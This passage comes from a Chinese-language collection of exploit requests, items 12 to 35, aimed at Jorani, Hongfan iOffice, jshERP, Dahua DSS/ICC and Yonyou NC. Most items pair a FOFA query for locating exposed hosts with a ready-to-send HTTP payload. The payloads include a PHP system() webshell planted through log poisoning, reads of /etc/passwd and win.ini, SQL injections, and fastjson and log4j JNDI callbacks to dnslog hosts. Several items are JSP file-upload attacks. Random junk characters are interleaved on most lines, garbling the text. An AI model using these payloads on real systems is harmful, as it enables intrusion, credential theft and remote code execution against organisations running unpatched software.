Host: 127.0.0.1
7 V }; V3 P9 K0 v8 b" t0 sPragma: no-cache
/ o1 P N0 g. g/ |& w# \2 DCache-Control: no-cache$ k% _) P8 f! ~
Upgrade-Insecure-Requests: 1, _2 Y# g1 _ O5 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
! u/ I! K) M; r! g5 }. ]* b7 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* d0 n5 Y; [' V7 `* I( A: f
Accept-Encoding: gzip, deflate
6 o1 t8 {2 ~9 ~, u$ t: b" iAccept-Language: zh-CN,zh;q=0.9,en;q=0.89 a3 N% g) [; d6 w
Connection: close4 k4 }: D9 R' A4 o. b* h
8 |) K% t. Q1 O- c: T
7 [, t( a. {: C/ z e12. Jorani < 1.0.2 远程命令执行4 a- x+ p- P0 }& X3 O7 W" I3 ^; a* _+ K
FOFA:title="Jorani" A* e4 G/ e( e5 M# A {
第一步先拿到cookie9 J9 x0 p0 V! c' |7 [( b& a
GET /session/login HTTP/1.1, n3 x3 J' v' [0 v! ?
Host: 192.168.190.30
3 z4 I7 }) w! ~- Y! K: lUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36. ~! s/ n' g7 @
Connection: close
& W+ O* j( A; W# F. A4 o. h: XAccept-Encoding: gzip( ]6 q; ~7 R6 M1 L. d
! O, F& B+ \7 D, i; h4 Q1 P- I4 t4 d( f* T6 v& H" b& x$ i
响应中csrf_cookie_jorani用于后续请求, f3 N& f9 B8 Z0 g( ` m
HTTP/1.1 200 OK( i; \. |7 a# H
Connection: close
; s0 w( E- O/ wCache-Control: no-store, no-cache, must-revalidate/ B. e0 K- L4 M- f. ]3 H
Content-Type: text/html; charset=UTF-8$ y7 g7 e: x3 f$ A2 y# U' Y
Date: Tue, 24 Oct 2023 09:34:28 GMT0 P- X0 [ ~ u' [; q" _" Z% Y
Expires: Thu, 19 Nov 1981 08:52:00 GMT
, b' B9 e7 n) [! z) a, Q% CLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
5 L7 u2 J( D4 d+ S, IPragma: no-cache
2 p7 h4 p9 m- V, J* pServer: Apache/2.4.54 (Debian)7 p) B! m3 K0 k% k0 B
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/5 }) G. a* |; [* z: Z( `
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
& g2 p! i, t5 t% ^; aVary: Accept-Encoding3 S3 N. y9 _8 k
y m+ m* P5 m0 n1 J- t, {5 i
3 `4 w% l0 u7 h2 c
POST请求,执行函数并进行base64编码
- F7 \, x' |! [) E/ t$ IPOST /session/login HTTP/1.1
9 I2 y! Q6 ~) c, Z# fHost: 192.168.190.30
# b& z2 R: P. U- e" DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.368 j% p- q) T0 \1 N' n) g2 ^
Connection: close( h. i& B$ P$ H
Content-Length: 252' z! ?% q/ B) a( D# ?9 R
Content-Type: application/x-www-form-urlencoded/ a: U( W4 J2 D, {* O0 Z
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
" Y$ N7 I* Z( h- c3 VAccept-Encoding: gzip1 E0 H1 o( y+ C. X' w/ p" ~
# m" B& f0 G+ q* {& ^5 J
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
( T5 U8 l1 X" c p+ i' r, @4 u( @; p$ W, M# X" Q
+ {8 Z# h+ j0 f% i+ |3 s% w. G
8 c I0 h" }- @; {, J
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串" Q! s' U, O" | Y- |
GET /pages/view/log-2023-10-24 HTTP/1.14 j8 H h! g0 G1 x+ J; V P( O8 I% p
Host: 192.168.190.30+ f' Z& Q3 h1 D9 {4 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' Z! z& h5 O5 G3 v8 w% K: @
Connection: close
- y- p5 W$ l2 E) y6 n4 f; Y. TCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
1 G8 ?5 h4 Z( I, LK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
: b5 @; p% ~# V; _, L0 NX-REQUESTED-WITH: XMLHttpRequest4 T" j# p) n" v, v' Y1 _% a
Accept-Encoding: gzip
! t0 o! ~, D. v2 v X, ]/ a- b2 p
! @# i! n/ _3 I5 k3 {
: n+ D4 i8 }$ y+ z6 x# [9 r( C13. 红帆iOffice ioFileDown任意文件读取
' t+ L! t6 L3 |) | ]# ?FOFA:app="红帆-ioffice"
4 Z0 y' m; {5 m, ]GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1 C. g5 g8 w4 P8 U2 L0 ?# b
Host: x.x.x.x
( j& ?$ S! {: ]; Q' n& `# `# eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
. n0 t7 I5 `$ x7 A: y. B- SConnection: close0 [& j& `; }( S1 w0 @1 g v
Accept: */*
% E l1 I* q: `, xAccept-Encoding: gzip
2 q' j5 V0 W6 `, W7 M6 E0 m- @4 d3 v: C. s: w0 B
$ V2 e4 k) e' n/ ]1 I, w- O
14. 华夏ERP(jshERP)敏感信息泄露- i% z, i: D+ ~
FOFA:body="jshERP-boot"$ M+ a6 ~+ d" L4 ~9 j5 p- D
泄露内容包括用户名密码* }/ E1 z5 u/ _4 O5 |0 m1 f! ?
GET /jshERP-boot/user/getAllList;.ico HTTP/1.19 N. X0 r, W- S+ L. h# n
Host: x.x.x.x
$ a9 g* [7 _( s& B/ ^9 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" ^0 _2 F9 W7 ?8 Y/ j7 s
Connection: close; O( L* Z! f6 }' ^7 J
Accept: */*5 v0 y: t& C4 a9 A
Accept-Language: en
: X( Y) P# x' q# |( B4 g# [Accept-Encoding: gzip" n4 b! k; I; c0 d/ Z$ v: k
8 _4 k3 r8 R% j: |* F, C/ i; b1 J
2 X" f! P; |9 Z4 J3 v& v* s' q
15. 华夏ERP getAllList信息泄露6 Y3 @: i/ a( A
CVE-2024-0490. R: `; Z+ y0 C j9 E
FOFA:body="jshERP-boot") N% p0 T. _- f% C( W; f4 ~4 a
泄露内容包括用户名密码1 f& c, @: w; \
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
2 I, M: \8 D+ ^) i6 p6 J. DHost: 192.168.40.130:100
) J+ E/ x9 q! u$ J# n# pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36# O! F L9 v7 s7 X
Connection: close* {% x; ?$ S3 k7 _) x( V- v8 j/ k
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8" b) o+ c+ T4 D* c b
Accept-Language: en$ z6 S3 u- b* {4 X* n% {/ G
sec-ch-ua-platform: Windows
9 n+ t. m, f* z+ g+ yAccept-Encoding: gzip
! i) g6 n. G7 \4 o4 i
8 K. ?4 t f1 [" z% Y l
' h2 g) \: j" e8 x: H16. 红帆HFOffice医微云SQL注入
6 ?0 l" l: M! P0 `% K0 w$ hFOFA:title="HFOffice"2 r4 D; e. @; u) \3 M; S$ L* r
poc中调用函数计算1234的md5值
% d3 v# p. Y" l+ tGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1 {% V9 M ~+ g5 s" w9 w
Host: x.x.x.x
8 U# y* }+ {% f" [9 d- t8 i" A& zUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36; n1 H4 t2 t% B6 ?, l6 ~, ] g
Connection: close0 I3 i" z+ T5 }+ S; L7 L+ g
Accept: */*$ p+ X) v, D& |4 j
Accept-Language: en0 _8 ~- t$ ]3 S7 q
Accept-Encoding: gzip; X% ^0 ~. S0 }! t2 w2 u
. ^' I K, G0 |% |: T$ ^* B! j* j; X ^$ p7 l* [
17. 大华 DSS itcBulletin SQL 注入$ o# P) P9 p. H2 C+ F j, }$ ~3 e
FOFA:app="dahua-DSS"! I. D/ K! J* c( n/ ]' s3 `- P
POST /portal/services/itcBulletin?wsdl HTTP/1.1
- c# v% U( I" U; G( M% d uHost: x.x.x.x
/ P9 s9 L7 M L3 x2 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ F5 D2 {9 x& w; p$ T" \
Connection: close# C1 A2 \$ @& n. @
Content-Length: 345
2 | G9 N3 K! c# \3 a0 A% YAccept-Encoding: gzip- d3 p! P. z' s/ k; c- ^, a3 u; Q
4 v" f8 A' u% F5 U
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
" J" ^" Y9 `3 H4 H$ D+ a<s11:Body>
7 }/ W( E4 l. T2 j. ?" ?: b <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>9 t0 J9 ~( p7 |' D. [+ s
<netMarkings>
2 p5 u0 E8 _7 k6 p2 s( H (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
6 \) W6 b( J; z% a% |8 p </netMarkings>. w6 d- ], j$ W. W
</ns1:deleteBulletin>: L. e% }# H7 d; X* T
</s11:Body>
p) V5 C! a9 `$ k</s11:Envelope>
& v! L; o. y" C/ q1 |9 o H2 T) Q/ c+ {
+ S8 A5 S1 L/ `8 @6 w18. 大华 DSS 数字监控系统 user_edit.action 信息泄露! Y$ m7 `$ ]3 [
FOFA:app="dahua-DSS"
: |; M! e* U3 |. r* A% tGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
) O4 X" j% q1 V# c- I9 }* g) |Host: your-ip4 V: \& ~8 p% ?' H) D, K& n- m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 C" |1 i' ]' l2 A) M2 O; O1 HAccept-Encoding: gzip, deflate
% ~$ k4 O. |! c( d8 U: YAccept: */*% p- Q( C# ~4 ]: Z p6 }& m3 @
Connection: keep-alive
4 w1 x: b$ P0 J r; Y+ P. H, Y: u8 `$ e* ?6 @# |/ E
4 V5 `* b! w" ^6 }4 W1 O% h8 G
/ d) ~: |7 L6 p( J& E: S
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
, |" X$ z" f* p# b# x' x) lFOFA:app="dahua-DSS"
# D" X6 x2 j8 aGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
7 C" q/ G+ c" n% b+ F8 s& RHost:4 \, L6 x/ d; R7 s8 {: `5 }
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 o& O; X, i( q0 [6 _3 PAccept-Encoding: gzip, deflate& W; k- V7 @- q* e3 a5 w2 ]9 |& ]
Accept: */*+ Z/ o' I5 R k
Connection: keep-alive
; ~9 E; z) @5 f3 Y+ S/ Q# `: K4 e' V& J: f& [2 `- U' r
7 {# ]: _9 S( g* ~5 I# J
20. 大华ICC智能物联综合管理平台任意文件读取
2 Q- i& e% j/ l! m6 r7 S% \7 n- bFOFA:body="*客户端会小于800*"
) M+ u( z3 n# t1 Z, a# p- FGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.12 H% e% W) o8 R6 C" p8 H" Z1 b8 p
Host: x.x.x.x
+ |* i8 e: @, eUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, y9 {8 c) y. L- X. ]Connection: close9 I7 {3 ~5 `" ?+ }
Accept: */*
( Y' s6 Z1 a) O9 l5 U% ~7 A! z1 dAccept-Language: en
+ ~, V5 i: u7 ]$ YAccept-Encoding: gzip
3 x1 J: W* K6 G3 |, ]
5 j" V9 S6 y0 j4 Y( L8 a
2 w- Q: }0 ?/ N' c9 r* v$ n' n21. 大华ICC智能物联综合管理平台random远程代码执行
2 ]& F9 j# X7 WFOFA:icon_hash="-1935899595"
. M! ?" ]9 i& JPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
7 W6 H! W. b! S3 aHost: x.x.x.x
4 F3 \" x4 i3 A& O8 i& CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& Z/ A% h' P/ c e, p) pContent-Length: 161 E' d/ e4 J5 f% J( D* l
Accept-Encoding: gzip
2 F* {- X) M4 m6 S6 a$ `5 _Connection: close8 P" u4 E' W$ b" S0 A
Content-Type: application/json;charset=utf-8
( G* e' W$ X% A- e* O; ?! m# Y# m3 v* s( u8 H# o1 n
{! {% c2 v& }+ I5 ]6 c
"a":{& ?5 r/ b: K1 o; k7 y- f
"@type":"com.alibaba.fastjson.JSONObject",
9 [7 z2 h0 N1 S0 c! U {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}2 l2 J6 U) ?6 }1 {4 ]4 J
}""
7 o' `- D0 w* V& a}" w$ x$ k& r1 n8 {! U7 h" |
, o" p: F6 V& L/ ^& Z2 h" D1 [7 D, v9 L" X) k, W
22. 大华ICC智能物联综合管理平台 log4j远程代码执行6 z1 k+ F9 d$ D: S; t
FOFA:icon_hash="-1935899595"
4 Z2 L/ _& v9 ?) J/ OPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1! T# O. x" y3 Z1 c1 b- v
Host: your-ip2 A$ m+ x( r& q3 u5 J9 V( {! p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% a- G; k; A& X4 o7 v
Content-Type: application/json;charset=utf-8/ @5 ]/ z. `: y6 o
& J/ k; _. I, l) J. _{ e6 G4 G: h, F6 M& r
"loginName":"${jndi:ldap://dnslog}", k) T5 ~, v, Z. W) H
}! ]- y% {" L, H y# A
& [: w0 L! V5 Y D( }2 t( a* I- l, K: }. T, R/ ~
2 u3 H) J2 c+ c- V4 B, z) @9 ]
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行8 R" n* n) Y8 A
FOFA:icon_hash="-1935899595"
. c4 \3 ?! A9 ^POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.10 D, y+ x6 c; I- a% j* m
Host: your-ip
# b9 y- [6 r M& K9 E8 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: K* O8 k8 Y1 Y
Content-Type: application/json;charset=utf-82 O2 F9 p; X% P2 Z* F3 O8 P
Accept-Encoding: gzip9 v; d" H# b: u: |1 q* w- s# d) d
Connection: close, H8 j+ Z6 I! J7 E
6 e# N6 o& Q& \! S, R; {
{4 p1 E& u( y- a* ~
"a":{# s% b! p- |" b6 m9 O s$ t
"@type":"com.alibaba.fastjson.JSONObject",
/ H8 f: n( e3 a+ I {"@type":"java.net.URL","val":"http://DNSLOG"}, J3 v: b: s* ?8 A4 \0 M, m% ~
}""
+ h" J6 M5 W. X}- J3 t' p. {- X- O7 Y" U
$ q/ c6 Q! P, g3 D& r* }3 g4 U( C1 S& v
24. 用友NC 6.5 accept.jsp任意文件上传
) J0 H/ Y9 J4 _2 p" b2 VFOFA:icon_hash="1085941792"( x3 r, ^) H( d& x
POST /aim/equipmap/accept.jsp HTTP/1.1
+ j" X; c; V' e7 f3 R d. GHost: x.x.x.x& t/ }1 F* Q( {' f5 S& d% {
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.367 h4 d6 N& w0 Q5 d
Connection: close1 p/ o" I" s. Q$ [% W7 z
Content-Length: 449
& [2 w; V' N4 V3 DAccept: */*
6 A/ b+ d$ I' V2 H5 eAccept-Encoding: gzip
" J6 e) q9 {5 ?7 C6 DContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
7 {- x3 @$ d) ^1 Q) b/ v
! W! Z5 H. |2 T S-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
3 @! k/ J1 R& d6 l4 I8 YContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
. _4 _ P! V! S4 AContent-Type: text/plain
0 G; I3 ^: z/ e, V$ Z8 d2 w! x' r! D8 ^
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
& k6 G; v2 v/ M-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
u5 q* b8 U s; y+ X9 NContent-Disposition: form-data; name="fname"/ Q6 ?. h$ I( `" f8 V& N# q# D
& d6 o" m* Q, _% z( [* {% h$ n\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
, @. S" s& F5 d' \9 m+ O4 w$ z9 J-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
7 g& g. X7 x) j3 R" O+ E" C( T; `* y: M
% Y5 m8 R# C* G8 @: `# Q25. 用友NC registerServlet JNDI 远程代码执行! d( q( R2 O8 Z* h6 m+ p
FOFA:app="用友-UFIDA-NC": S5 \% f: h' b% g
POST /portal/registerServlet HTTP/1.1
% i( \; q. b! v. LHost: your-ip% q, {& O7 q1 i8 R0 O# }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
7 R0 s+ d/ Y9 A) z! T( Q$ fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
( U" U0 x+ w X9 w5 cAccept-Encoding: gzip, deflate
. N+ ^* n" P& X5 b9 vAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
l4 ~" C- a& h* ?Content-Type: application/x-www-form-urlencoded
- o8 B' U1 k2 e1 _4 q- i& |5 r
% a6 T! L3 K# J* t' htype=1&dsname=ldap://dnslog% c. E* c8 g: M, X, u
5 q4 [/ B& G, ?- `7 {+ L/ Q5 L( S9 J9 X
6 C$ |% ]" |1 F- \' ]
26. 用友NC linkVoucher SQL注入
0 j( V) H5 G4 \! Z2 o/ |/ I! nFOFA:app="用友-UFIDA-NC"2 k8 J8 T! k2 D; r4 B. }! E
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ E1 d1 y0 B# @1 D9 j Z
Host: your-ip
9 |3 u3 F8 U# E: r4 q X: g$ Q3 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& ]3 M+ Q2 G& s! i5 |4 NContent-Type: application/x-www-form-urlencoded
' E. D4 _$ k: ~" N+ BAccept-Encoding: gzip, deflate% e b' p \' a, ~0 c; D9 J
Accept: */*
* { o+ w* y( m' l1 `& KConnection: keep-alive
$ v2 g* G& O- e8 U9 h7 L" ~+ \+ p9 L3 @, J% R' ^. a V, j
) \( U' [% M$ C
27. 用友 NC showcontent SQL注入
1 ~; ^6 _5 d% F1 U' j3 z8 {, rFOFA:icon_hash="1085941792": \# H0 q; T: Y
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1& B. E; i/ p7 l6 @
Host: your-ip
# O6 w3 Y5 ^) s/ u/ V& cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" K" I" K/ v0 j" OAccept-Encoding: identity7 H; ] M$ B9 m$ f3 F
Connection: close- y u+ u3 H2 D* M$ F, ~/ F2 h
Content-Type: text/xml; charset=utf-8
5 T1 `/ O# n/ F. x7 \# Q8 h+ v: C7 u" u' Y
0 g8 G* Y+ W3 L+ h& l0 r1 ]' {
28. 用友NC grouptemplet 任意文件上传
) r8 Z' m8 z1 \6 V+ cFOFA:icon_hash="1085941792"
+ H! `- l w7 |1 ~4 bPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
0 G A1 P! K6 \# i: P4 P8 vHost: x.x.x.x4 R7 {' ^2 ?2 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.363 l7 h2 b# ]7 k1 Q! ]9 n% i
Connection: close8 m8 P( E, b6 h4 X+ y( u5 p" q
Content-Length: 268. I0 \# E. ]! n8 V
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk7 E9 y5 s7 U$ X
Accept-Encoding: gzip, _; ?. N' c6 e- Z% K& [- k
! J% e2 c' ], w" k8 Q$ Z8 k------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
+ P9 `9 X! l7 f( D/ C2 S+ JContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
2 c( R! u: Z# A4 T! J/ ~! JContent-Type: application/octet-stream
* [5 e2 d: C, |1 }3 G; ~* y; X6 t2 T' ]
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
R: U0 a8 u" o------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--- y4 n4 X3 e5 c" X* _1 J( C
% Z8 s8 F0 P- D8 G/ _6 d" F: C9 Z( L) Y! M3 F( v
/uapim/static/pages/nc/head.jsp
6 Z% ?5 d! U8 e$ `/ o5 g, N1 G7 C7 B4 @$ Q# N1 g
29. 用友NC down/bill SQL注入0 w; r( H4 `$ M+ H7 z. U* R5 D
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
* d1 O: x$ u3 |GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
3 D, @$ b7 l* U7 f$ [; sHost: your-ip
& W* R; p- b2 Y1 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 d- Q: A& S d$ q# g2 j C4 |( D
Content-Type: application/x-www-form-urlencoded. ~9 l4 d( d" s* i& ^ x7 X
Accept-Encoding: gzip, deflate; }& q& I+ F) n( H& x4 z
Accept: */*
0 i: y2 E* Y2 AConnection: keep-alive+ w6 f% x% l9 T; V$ Z. m/ O0 r
4 f7 p7 D. d. @$ \1 c3 _
( [- o/ @7 j5 S) M
30. 用友NC importPml SQL注入
7 p' p( \7 }# I- i5 v/ ]" S# G! yFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
) k& x6 Y( r9 J3 U4 P* N. RPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1% H# ~7 }- t! J) n* j& x. _# p
Host: your-ip
0 q7 ^5 Q! B6 g D FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
* K- K* ^* q+ P3 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36$ S4 K0 O, f1 S; B0 F# j- n2 f- L- i
Connection: close- a) ]3 Q4 A' i/ R
4 a9 O. D8 k4 n! U4 E( L+ S9 K% x------WebKitFormBoundaryH970hbttBhoCyj9V
3 F6 `. @9 N, r! g. I' g/ `Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
+ w' }3 p9 R. L+ k% J: v6 vContent-Type: image/jpeg- S3 x/ k% ]6 ?: X4 k
------WebKitFormBoundaryH970hbttBhoCyj9V--* |: w2 D+ o( |6 R3 _) g
/ c1 y0 k2 R/ T
, E0 W& y0 N2 c( Y4 B3 E& ~6 \31. 用友NC runStateServlet SQL注入
) S$ C) R0 p: C* T; [6 T$ Uversion<=6.5
4 x2 t1 Y: N: VFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
( O) }! _! @3 RGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 @3 d( r, J5 \ R9 O7 OHost: host
3 e1 T9 ^ O0 M8 z kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36! l+ M/ v+ p- `- k% x t
Content-Type: application/x-www-form-urlencoded
, P% P+ A" z7 ^3 O$ P; o! o5 X
/ ?4 U6 [2 T4 W8 {1 J& C3 ~
+ B5 L ]9 ~- D& Z2 W; b; E32. 用友NC complainbilldetail SQL注入% C R- m; A5 C6 s6 ^6 T0 D
version= NC633、NC65
6 N8 C, H0 ]% e8 e/ H/ K5 @FOFA:app="用友-UFIDA-NC"
2 g5 H) i3 s O( PGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.17 }$ W3 `9 R% |
Host: your-ip
& J3 y; W# L" A; fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 f }; N& U# ]. M7 M
Content-Type: application/x-www-form-urlencoded/ p9 M, o' [' @8 k6 `- v
Accept-Encoding: gzip, deflate# `! t6 h7 [# S
Accept: */*$ ] H9 N5 D) _, ]1 a: ?4 R. [
Connection: keep-alive
0 ^' C( j) g2 W9 G Z6 ~) w+ x! Q3 W9 p# i; e5 U
6 J) [4 C$ @# i! {4 C- W4 f) C# O& L33. 用友NC downTax/download SQL注入
! K4 B" u- t) l5 Z; i3 [version:NC6.5FOFA:app="用友-UFIDA-NC"+ ?! y. U- i* ] \+ L. M
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.12 H1 _" U1 W! I# D
Host: your-ip) l8 V `) o$ S7 I( q" v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" `. I% I8 `9 l0 B uContent-Type: application/x-www-form-urlencoded
% J- I' ?" [/ F; L, d- FAccept-Encoding: gzip, deflate2 C6 z9 U1 j& q; T
Accept: */*
# T5 h) m2 U* d" M7 }4 j# ]3 ?Connection: keep-alive
4 P* ~$ d5 Y# B0 j |7 i5 y( L- N7 C' b3 ?" c3 J' g+ [
- s. p4 y3 q# `0 a- x' d8 \, M
34. 用友NC warningDetailInfo接口SQL注入
1 X$ H5 x) ]' r! _# DFOFA:app="用友-UFIDA-NC"
5 @* N, ?& a: n( |5 ?2 a- iGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.16 {! X/ q2 i+ l9 H4 }2 K
Host: your-ip% G4 J" Y0 {0 M* P5 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 X/ X1 |* F4 B9 r1 `* \' x" s
Content-Type: application/x-www-form-urlencoded( N; r9 J9 [$ b* K5 P
Accept-Encoding: gzip, deflate+ H' ^! j: d! `( D
Accept: */*; I; E1 Y) Q' ~/ X, z: ^
Connection: keep-alive
$ y& ?8 N3 Y2 B& D& v. Z. R, G! q* S, `5 ~: A
, U0 B7 O3 I3 g5 r9 }9 }& a' }& b35. 用友NC-Cloud importhttpscer任意文件上传
0 `6 C( Q- w( B, h- W9 D) D. P6 `FOFA:app="用友-NC-Cloud"1 ^$ r' Z) b8 j# n
